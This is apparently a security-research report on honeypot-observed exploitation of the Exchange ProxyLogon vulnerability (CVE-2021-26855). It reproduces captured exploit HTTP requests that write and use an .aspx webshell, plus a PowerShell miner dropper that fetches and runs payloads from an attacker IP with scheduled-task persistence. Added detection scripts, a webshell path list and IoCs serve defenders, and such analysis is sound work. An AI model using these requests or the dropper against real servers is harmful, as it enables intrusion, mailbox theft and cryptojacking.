Background
On March 2, 2021, Microsoft disclosed a remote code execution vulnerability in Microsoft Exchange Server [1].
Starting March 3, 2021, the Anglerfish honeypot of 360 Netlab began emulating Microsoft Exchange and deploying an Exchange honeypot plugin. We quickly collected a large volume of vulnerability-probing data, and we have since observed attackers implanting webshells, harvesting mailbox information, and even running XMRig malicious mining (http://178.62.226.184/run.ps1). Based on the path name used for the miner files, we named this miner Tripleone.
Starting March 6, 2021, ProjectDiscovery and Microsoft's CSS-Exchange project successively published vulnerability detection scripts [2][3].
Exploiting the Microsoft Exchange Server remote code execution vulnerability is a multi-step process, and it normally takes some time after a PoC is published before criminal attackers put it to use; we can see that this phase has already begun.
CVE-2021-26855: webshell implant
POST /ecp/j2r3.js HTTP/1.1
Host: {target}
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/json; charset=utf-8
Cookie: X-BEResource=Administrator@EXCHANGE01:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=bTEwQdC2fkijeS-2wvtAdCnAngle7rfishIlH4dgINcqO6mYA4bY-ATaZjT2ZzjTIil62g3Tg23.&a=~1942062522; ASP.NET_SessionId=00782f75-8b35-11eb-af5a-560002fbb132; msExchEcpCanary=bTEwQdC2fkijeS-2wvtAdCnAngle7rfishIlH4dgINcqO6mYA4bY-ATaZjT2ZzjTIil62g3Tg23.
msExchLogonMailbox: S-1-5-20
Content-Length: 381

{"properties": {"Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", "FilePathName": "\\\\\\\\\\\\\\\\127.0.0.1\\\\\\\\c$\\\\\\\\Program Files\\\\\\\\Microsoft\\\\\\\\Exchange Server\\\\\\\\V15\\\\\\\\FrontEnd\\\\\\\\HttpProxy\\\\\\\\owa\\\\\\\\auth\\\\\\\\test1337.aspx"}}, "identity": {"DisplayName": "OAB (Default Web Site)", "__type": "Identity:ECP", "RawIdentity": "7280d03f-194a-4bf3-98a7-076e7728321d"}}
CVE-2021-26855: harvesting mailbox information
POST //ecp/ssrf.js HTTP/1.1
Host: {target}
Connection: close
Accept-Encoding: gzip
Accept: */*
User-Agent: Hello-World
Content-Type: text/xml
Cookie: X-BEResource=IBM-EX01/EWS/Exchange.asmx?a=~1942062522;
Content-Length: 756

<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
Default admin@domain.tld
CVE-2021-26855: mining attack
POST /owa/auth/test1337.aspx HTTP/1.1
Host: {target}
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.25.1
Content-Length: 211
Content-Type: application/x-www-form-urlencoded

code=Response.Write%28new+ActiveXObject%28%22WScript.Shell%22%29.exec%28%22powershell+IEX+%28New-Object+Net.WebClient%29.DownloadString%28http%3A%2F%2F178.62.226.184%2Frun.ps1%29%22%29.StdOut.ReadAll%28%29%29%3B
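The three requests above leave distinct traces in the Exchange front-end HTTP logs: a client-supplied X-BEResource cookie (the CVE-2021-26855 SSRF primitive) aimed at either the DDI service or EWS, and a POST to a freshly dropped .aspx carrying shell-execution tokens in its form body. The following detection logic is an added example and is not code from the original post or from the Anglerfish honeypot. The log records are constructed to mirror the captures above; the record shape (method, path, headers, body) is an assumption about how a log pipeline hands requests over, and the webshell path set is a small subset of the probe list given later in this post.

```python
import re
from urllib.parse import unquote_plus

# Constructed log records mirroring the captured requests above (assumed shape:
# a log pipeline hands over method, path, headers and body per request).
SAMPLE_REQUESTS = [
    {   # SSRF through X-BEResource to the DDI service, writing an .aspx file
        "method": "POST", "path": "/ecp/j2r3.js",
        "headers": {"Cookie": "X-BEResource=Administrator@EXCHANGE01:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&a=~1942062522; ASP.NET_SessionId=constructed"},
        "body": r'{"properties": {"Parameters": {"FilePathName": "\\\\127.0.0.1\\c$\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\test1337.aspx"}}}',
    },
    {   # SSRF through X-BEResource to the EWS endpoint (mailbox access)
        "method": "POST", "path": "//ecp/ssrf.js",
        "headers": {"Cookie": "X-BEResource=IBM-EX01/EWS/Exchange.asmx?a=~1942062522;"},
        "body": '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"></soap:Envelope>',
    },
    {   # command execution through the dropped webshell (constructed, harmless command)
        "method": "POST", "path": "/owa/auth/test1337.aspx",
        "headers": {"Content-Type": "application/x-www-form-urlencoded"},
        "body": "code=Response.Write%28new+ActiveXObject%28%22WScript.Shell%22%29.exec%28%22powershell+-c+hostname%22%29.StdOut.ReadAll%28%29%29%3B",
    },
    {"method": "GET", "path": "/owa/auth/logon.aspx", "headers": {}, "body": ""},      # legitimate OWA page
    {"method": "GET", "path": "/owa/auth/OutlookEN.aspx", "headers": {}, "body": ""},  # known webshell name probe
]

# Subset of the webshell file names listed in this post; compared case-insensitively
# because the list contains both OutlookEN.aspx and outlooken.aspx.
KNOWN_WEBSHELL_PATHS = {p.lower() for p in [
    "/owa/auth/Current/scripts/premium/fexppw.aspx",
    "/owa/auth/OutlookEN.aspx",
    "/owa/auth/logg.aspx",
    "/owa/auth/8Lw7tAhF9i1pJnRo.aspx",
    "/owa/auth/shell.aspx",
    "/owa/auth/evilcorp.aspx",
    "/owa/auth/test1337.aspx",
    "/owa/auth/proxylogon.aspx",
]}

BERESOURCE_RE = re.compile(r"X-BEResource=([^;]*)")
SHELL_EXEC_RE = re.compile(r"WScript\.Shell|powershell|cmd\.exe|Process\.Start", re.I)


def classify(req):
    """Return the list of detection names that fire for one request record."""
    findings = []
    cookie = req.get("headers", {}).get("Cookie", "")
    path = req["path"].lower()
    body = req.get("body", "")

    # 1. X-BEResource in a client cookie is the SSRF primitive; the back-end target
    #    it names tells us what the attacker was after.
    m = BERESOURCE_RE.search(cookie)
    if m:
        target = m.group(1)
        if "DDIService.svc" in target and "FilePathName" in body and ".aspx" in body:
            findings.append("proxylogon_ssrf_webshell_write")
        elif "/EWS/Exchange.asmx" in target:
            findings.append("proxylogon_ssrf_ews_mailbox_access")
        else:
            findings.append("proxylogon_ssrf_beresource_cookie")

    # 2. A POST to an .aspx under /owa/auth/ whose form-decoded body carries
    #    shell-execution tokens is webshell command execution.
    if req["method"] == "POST" and path.startswith("/owa/auth/") and path.endswith(".aspx"):
        if SHELL_EXEC_RE.search(unquote_plus(body)):
            findings.append("webshell_command_execution")

    # 3. Any request for a known webshell file name is at least a probe.
    if path in KNOWN_WEBSHELL_PATHS:
        findings.append("known_webshell_path_probe")
    return findings


def scan(records):
    """Return (path, findings) for every record that triggers at least one detection."""
    hits = []
    for rec in records:
        findings = classify(rec)
        if findings:
            hits.append((rec["path"], findings))
    return hits


if __name__ == "__main__":
    for path, findings in scan(SAMPLE_REQUESTS):
        print(path, "->", ", ".join(findings))
```

Rule 1 is the high-confidence signal: no legitimate client ever sends an X-BEResource cookie, so a single hit warrants pulling the HttpProxy logs for that source. Rule 3 is weaker on its own, since several names in the probe list later in this post (logon.aspx, expiredpassword.aspx, errorFE.aspx) collide with files that ship with Exchange; a path match there is a probing indicator and confirmation needs a look at the file on disk and its modification time.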
The attacker implants the XMRig miner through the file http://178.62.226.184/run.ps1; the attack details are as follows:
$ProcessActive = Get-Process javacpl -ErrorAction SilentlyContinue
if($ProcessActive -eq $null){
new-item c:\temp\111 -itemtype directory
$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile("http://178.62.226.184/config.json","C:\temp\111\config.json")
$WebClient.DownloadFile("http://178.62.226.184/javacpl.exe","C:\temp\111\javacpl.exe")
$WebClient.DownloadFile("http://178.62.226.184/WinRing0x64.sys","C:\temp\111\WinRing0x64.sys")
Start-Process -Filepath "C:\temp\111\javacpl.exe"
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-windowstyle hidden -executionpolicy bypass -noprofile IEX (New-Object Net.WebClient).DownloadString("http://178.62.226.184/run.ps1")"
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 3)
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "App2" -Description "Check"
}else{Write-host "run"}
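The dropper above follows a fixed pattern: check whether the miner process is already running, download the payload files, start the miner, and register a scheduled task that re-runs the same download cradle every 3 minutes. The static triage below is an added example, not code from the original post, that pulls the URLs, dropped file paths and task name out of such a script and flags the persistence and download-cradle constructs. The sample script is a constructed variant of the one above in which the real address has been replaced by the TEST-NET placeholder 198.51.100.10.

```python
import re

# Constructed sample: the dropper above with its real address replaced by a
# TEST-NET placeholder (198.51.100.10), kept structurally identical.
SAMPLE_SCRIPT = r'''
$ProcessActive = Get-Process javacpl -ErrorAction SilentlyContinue
if($ProcessActive -eq $null){
new-item c:\temp\111 -itemtype directory
$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile("http://198.51.100.10/config.json","C:\temp\111\config.json")
$WebClient.DownloadFile("http://198.51.100.10/javacpl.exe","C:\temp\111\javacpl.exe")
$WebClient.DownloadFile("http://198.51.100.10/WinRing0x64.sys","C:\temp\111\WinRing0x64.sys")
Start-Process -Filepath "C:\temp\111\javacpl.exe"
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-windowstyle hidden -executionpolicy bypass -noprofile IEX (New-Object Net.WebClient).DownloadString("http://198.51.100.10/run.ps1")"
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 3)
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "App2" -Description "Check"
}else{Write-host "run"}
'''

# Extractors for the artefacts an incident responder wants out of the script.
URL_RE = re.compile(r"""https?://[^\s"')]+""")
PATH_RE = re.compile(r"""[A-Za-z]:\\[^\s"'),]+""")       # Windows drive-letter paths
TASK_NAME_RE = re.compile(r'-TaskName\s+"([^"]+)"', re.I)

# Behavioural indicators, checked in this order.
INDICATORS = [
    ("download_cradle", re.compile(r"IEX\s*\(?\s*New-Object\s+Net\.WebClient\)?\.DownloadString", re.I)),
    ("file_download", re.compile(r"\.DownloadFile\(", re.I)),
    ("scheduled_task_persistence", re.compile(r"Register-ScheduledTask", re.I)),
    ("execution_policy_bypass", re.compile(r"-executionpolicy\s+bypass", re.I)),
    ("hidden_window", re.compile(r"-windowstyle\s+hidden", re.I)),
    ("process_start", re.compile(r"Start-Process\b", re.I)),
]


def analyze_powershell(script):
    """Return indicators that fired plus the URLs, file paths and task names found."""
    return {
        "indicators": [name for name, rx in INDICATORS if rx.search(script)],
        "urls": sorted(set(URL_RE.findall(script))),
        "paths": sorted(set(PATH_RE.findall(script))),
        "task_names": TASK_NAME_RE.findall(script),
    }


def verdict(report):
    """A script that downloads, runs and schedules itself is treated as a dropper."""
    fired = set(report["indicators"])
    if fired & {"scheduled_task_persistence"} and fired & {"download_cradle", "file_download"} and "process_start" in fired:
        return "dropper_with_persistence"
    if fired:
        return "suspicious"
    return "clean"


if __name__ == "__main__":
    report = analyze_powershell(SAMPLE_SCRIPT)
    print(verdict(report))
    for key in ("indicators", "urls", "paths", "task_names"):
        print(key, report[key])
```

The extracted task name and file paths are what to check on a suspected host: a scheduled task named "App2" with a 3-minute repetition that launches a hidden PowerShell download cradle, and a C:\temp\111 directory holding the miner binary, its config.json and the WinRing0x64.sys driver. The URL list feeds straight into proxy and DNS log searches.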
View from Anglerfish honeypot data
Starting March 6, 2021, the 360 Netlab Anglerfish honeypot system detected scanning for the Microsoft Exchange vulnerability (CVE-2021-26855). As of now, the geographic distribution of scanning source IPs is as follows:
Analysis of the scanned ports shows that the main target port is 443 (77.3%), followed by port 80 (11.3%), as shown in the figure below:
Analysis of the captured scanning traffic shows that the scanning source IP ASNs (Autonomous System Numbers) are mainly Linode, LLC, DiGiTALOCEAN-ASN and LeaseWeb Netherlands B.V., together accounting for over 50%. The overall scanning trend is as follows:
Scanning source IPs come from countries all over the world, with the United States accounting for the largest share, as shown in the figure below:
Analysis of the captured traffic shows that the top 5 scanning IPs account for 50% of all scanning activity, and 159.89.95.163 alone accounts for 24%, which points to a degree of organization behind that IP.
Analysis of the attack traffic shows that attackers are already able to exploit the vulnerability successfully and implant webshells, as shown in the figure below:
Attackers then use the webshell to carry out further malicious operations, such as implanting the XMRig miner, as shown in the figure below:
rDNS SLD information for some scanning source IPs
A quick look at the rDNS information for the source IPs scanning for the Microsoft Exchange vulnerability (CVE-2021-26855) reveals some of the organizations behind them.
Webshell analysis
We observed a large number of webshell path probing requests, most of which are scanning activity by security vendors and research institutions.
The known webshell paths (with request counts) are listed below:
GET /owa/auth/Current/scripts/premium/fexppw.aspx 2067
GET /owa/auth/OutlookEN.aspx 1998
GET /owa/auth/logg.aspx 1646
GET /owa/auth/8Lw7tAhF9i1pJnRo.aspx 1637
GET /owa/auth/a.aspx 1616
GET /owa/auth/Current/themes/errorFS.aspx 1601
GET /owa/auth/errorPage.aspx 1590
GET /owa/auth/getpp.aspx 1556
GET /owa/auth/default.aspx 1539
GET /owa/auth/fatal-erro.aspx 1521
GET /owa/auth/errorPages.aspx 1516
GET /owa/auth/log.aspx 1503
GET /owa/auth/shel90.aspx 1467
GET /owa/auth/Err0r.aspx 1458
GET /owa/auth/logout.aspx 1443
GET /owa/auth/15.0.1347/themes/resources/exchange_create_css.aspx 1432
GET /owa/auth/RedirSuiteServerProxy.aspx 1412
GET /owa/auth/current/one1.aspx 1408
GET /owa/auth/one.aspx 1309
GET /owa/auth/Current/themes/resources/owafont_vo.aspx 1279
GET /owa/auth/Current/app222.aspx 1216
GET /owa/auth/15.0.847/themes/resources/hmask.aspx 1212
GET /owa/auth/15.1.1913/themes/resources/View_Photos.aspx 1210
GET /owa/auth/ErrorAA.aspx 1126
GET /owa/auth/one1.aspx 1101
GET /owa/auth/zntwv.aspx 1060
GET /owa/auth/bob.aspx 1013
GET /owa/auth/Current/themes/resources/owafont_vn.aspx 1009
GET /owa/auth/shel2.aspx 1001
GET /owa/auth/shel.aspx 1000
GET /owa/auth/OutlookZH.aspx 990
GET /owa/auth/Current/themes/resources/daxlz.aspx 988
GET /owa/auth/authhead.aspx 981
GET /owa/auth/15.1.1913/themes/resources/bg_gradient_login.aspx 965
GET /owa/auth/web.aspx 422
GET /owa/auth/shell.aspx 415
GET /owa/auth/wanlin.aspx 410
GET /owa/auth/xx.aspx 408
GET /owa/auth/errorFF.aspx 403
GET /owa/auth/shellex.aspx 402
GET /owa/auth/errorEEE.aspx 402
GET /owa/auth/web.config.aspx 401
GET /owa/auth/t.aspx 400
GET /owa/auth/errorEE.aspx 399
GET /owa/auth/test.aspx 397
GET /owa/auth/healthcheck.aspx 397
GET /owa/auth/aspnet_client.aspx 395
GET /owa/auth/help.aspx 393
GET /owa/auth/error_page.aspx 392
GET /owa/auth/27fib.aspx 390
GET /owa/auth/document.aspx 388
GET /owa/auth/b.aspx 386
GET /owa/auth/aspnet_iisstart.aspx 385
GET /owa/auth/errorFE.aspx 384
GET /owa/auth/aspnettest.aspx 384
GET /owa/auth/evilcorp.aspx 382
GET /owa/auth/errorEW.aspx 382
GET /owa/auth/aspnet_www.aspx 377
GET /owa/auth/OutlookDA.aspx 265
GET /owa/auth/expiredpassword.aspx 176
GET /owa/auth/OutlookAR.aspx 158
GET /owa/auth/logoff.aspx 153
GET /owa/auth/OutlookES.aspx 151
GET /owa/auth/OutlookIO.aspx 146
GET /owa/auth/OutlookAS.aspx 145
GET /owa/auth/OutlookFR.aspx 136
GET /owa/auth/OutlookPL.aspx 133
GET /owa/auth/OutlookSE.aspx 133
GET /owa/auth/OutlookDE.aspx 128
GET /owa/auth/OutlookIT.aspx 126
GET /owa/auth/OutlookCN.aspx 112
GET /owa/auth/seclogon.aspx 61
GET /owa/auth/Current/themes/resources/system_io.aspx 57
GET /owa/auth/6GIXZG.aspx 57
GET /owa/auth/hmknq.aspx 54
GET /owa/auth/Current/themes/resources/View_tools.aspx 53
GET /owa/auth/15.1.225/scripts/premium/errorPE.aspx 53
GET /owa/auth/Current/themes/resources/Ignrop.aspx 53
GET /owa/auth/Current/themes/resources/OutlookQN.aspx 53
GET /owa/auth/Current/themes/resources/errorFE.aspx 53
GET /owa/auth/Current/AMNBJLXqoHTV.aspx 53
GET /owa/auth/ErrorDef.aspx 51
GET /owa/auth/DesktopShellExt.aspx 51
GET /owa/auth/logerr.aspx 48
GET /owa/auth/rlvgk.aspx 48
GET /owa/auth/owaauth.aspx 48
GET /owa/auth/pzbwl.aspx 48
GET /owa/auth/CommonError.aspx 46
GET /owa/auth/Current/themes/resources/logon.aspx 46
GET /owa/auth/Current/layout.aspx 46
GET /owa/auth/Current/themes/config1.aspx 46
GET /owa/auth/errorcheck.aspx 46
GET /owa/auth/ProximityService.aspx 45
GET /owa/auth/iasads.aspx 45
GET /owa/auth/15.1.2044/themes/resources/office365_ph.aspx 45
GET /owa/auth/atlthunk.aspx 45
GET /owa/auth/errorew.aspx 44
GET /owa/auth/rwinsta.aspx 44
GET /owa/auth/061a06908b.aspx 44
GET /owa/auth/15.0.1497/themes/resources/error.aspx 44
GET /owa/auth/Current/zJBxcBoI.aspx 44
GET /owa/auth/frow.aspx 43
GET /owa/auth/server.aspx 43
GET /owa/auth/erroreww.aspx 43
GET /owa/auth/fhsvc.aspx 43
GET /owa/auth/Current/Exchanges.aspx 42
GET /owa/auth/erroreee.aspx 42
GET /owa/auth/online.aspx 42
GET /owa/auth/outlooken.aspx 42
GET /owa/auth/erroree.aspx 42
GET /owa/auth/s.aspx 42
GET /owa/auth/XblGameSave.aspx 42
GET /owa/auth/errorpage.aspx 42
GET /owa/auth/secauth1.aspx 42
GET /owa/auth/secauth.aspx 42
GET /owa/auth/session.aspx 42
GET /owa/auth/8lw7tahf9i1pjnro.aspx 41
GET /owa/auth/outlookfront.aspx 41
GET /owa/auth/plorion.aspx 41
GET /owa/auth/outlookru.aspx 41
GET /owa/auth/proxylogon.aspx 41
GET /owa/auth/error.aspx 41
GET /owa/auth/qnx.aspx 41
GET /owa/auth/ovfwHWjwWm.aspx 41
GET /owa/auth/KBDBENE.aspx 40
GET /owa/auth/letmeinplzs.aspx 40
GET /owa/auth/OutlookUS.aspx 40
GET /owa/auth/jhJ2zT9ouOfP6VnBcHg3.aspx 40
GET /owa/auth/errorff.aspx 40
GET /owa/auth/login.aspx 40
GET /owa/auth/errorfff.aspx 40
GET /owa/auth/ntprint.aspx 39
GET /owa/auth/redirsuiteserverproxy.aspx 39
GET /owa/auth/OutlookDN.aspx 38
GET /owa/auth/errorpages.aspx 38
GET /owa/auth/load.aspx 38
GET /owa/auth/m0xbqRg1ranzvGD3jiXT.aspx 38
GET /owa/auth/jOBJIfr92ERLmg1HcnF3.aspx 37
GET /owa/auth/outlookjp.aspx 37
GET /owa/auth/discover.aspx 37
GET /owa/auth/xclkmcfldfi948398430fdjkfdkj.aspx 37
GET /owa/auth/hUjwpeROcY7Fo4g8ETH3.aspx 36
GET /owa/auth/multiup.aspx 35
GET /owa/auth/supp0rt.aspx 35
GET /owa/auth/HcDKNzBoha.aspx 35
GET /owa/auth/sol.aspx 35
GET /owa/auth/FR5Ha0D1dwfsqIUMhLCQ.aspx 34
GET /owa/auth/signon.aspx 34
GET /owa/auth/HUUPItrNpXvI.aspx 34
GET /owa/auth/dbuj9.aspx 34
GET /owa/auth/outlookzh.aspx 34
GET /owa/auth/L2oXwTljs3GnMyHQV0KR.aspx 33
GET /owa/auth/httpproxy.aspx 33
GET /owa/auth/XboxNetApiSvc.aspx 33
GET /owa/auth/signout.aspx 33
GET /owa/auth/KrhHyDPwb70ct362JmLn.aspx 32
GET /owa/auth/OutlookEN.US.aspx 32
GET /owa/auth/system_web/log.aspx 31
GET /owa/auth/tst1.aspx 31
GET /owa/auth/OutlookUN.aspx 31
GET /owa/auth/tpmvscmgrsvr.aspx 31
GET /owa/auth/shelltest.aspx 30
GET /owa/auth/aspx_client.aspx 30
GET /owa/auth/iispage.aspx 30
GET /owa/auth/aaa.aspx 30
GET /owa/auth/aa.aspx 30
GET /owa/auth/aspnet.aspx 28
GET /owa/auth/tNLPge.aspx 28
GET /owa/auth/VqEUaLjKpcWoNC7yPMlz.aspx 28
GET /owa/auth/test1337.aspx 27
GET /owa/auth/asas.aspx 27
GET /owa/auth/test13037.aspx 27
GET /owa/auth/aspnet_pages.aspx 26
GET /owa/auth/ahihi.aspx 26
GET /owa/auth/TimeoutLogout.aspx 26
GET /owa/auth/ZI3uMczmPa5bwTYVpKsE.aspx 26
GET /owa/auth/theme-gsx8ujzpicf0.aspx 24
GET /owa/auth/default1.aspx 22
GET /owa/auth/theme-vten8snn874b.aspx 21
POST /owa/auth/test1337.aspx 9
GET /owa/auth/OutlookJP.aspx 6
POST /owa/auth/Current/themes/resources/OutlookQN.aspx 5
GET /owa/auth/Logout.aspx 4
GET /owa/auth/HttpProxy.aspx 4
GET /owa/auth/Online.aspx 4
GET /owa/auth/OutlookRU.aspx 4
GET /owa/auth/MultiUp.aspx 2
GET /owa/auth/checkerror635284.aspx 2
GET /owa/auth/Discover.aspx 2
GET /owa/auth/Current/themes/resources/lgnleft.aspx 2
GET /owa/auth/WMSPDMOD.aspx 2
POST /owa/auth/oauth2-client.aspx 2
GET /owa/auth/1d61acae91.aspx 2
POST /owa/auth/RedirSuiteServerProxy.aspx 1
GET /owa/auth/lo.aspx 1
GET /owa/auth/error404.aspx 1
GET /owa/auth/current/themes/resources/error.aspx 1
Microsoft Exchange server distribution
Through its mapping of assets across the entire Internet, the 360 Quake cyberspace mapping system found 3,378,260 data records for Microsoft Exchange servers, corresponding to 534,590 unique IPs, distributed as shown in the figure below.
Contact us
Interested readers can reach us on twitter or by email at netlab[at]360.cn.
IoC
IP:
178.62.226.184
157.245.47.214
Miner Proxy:
159.65.206.137:3333
URL:
http://178.62.226.184/mini-reverse.ps1
http://178.62.226.184/run.ps1
http://178.62.226.184/config.json
http://178.62.226.184/javacpl.exe
http://178.62.226.184/WinRing0x64.sys
MD5:
79e2c9953f452f777d55749f01e5f3b7
2d4d75e46f6de65fba2451da71686322
0fe28f557e9997cd2750ff3fa86a659e
67f2d42e30f6239114feafc9ffd009d8
0c0195c48b6b8582fa6f6373032118da
Statement: This article comes from Netlab 360, and its copyright belongs to the author. The content represents only the author's independent views and not the position of 士冗科技; it is reproduced in order to convey more information. In case of infringement, please contact service@expshell.com.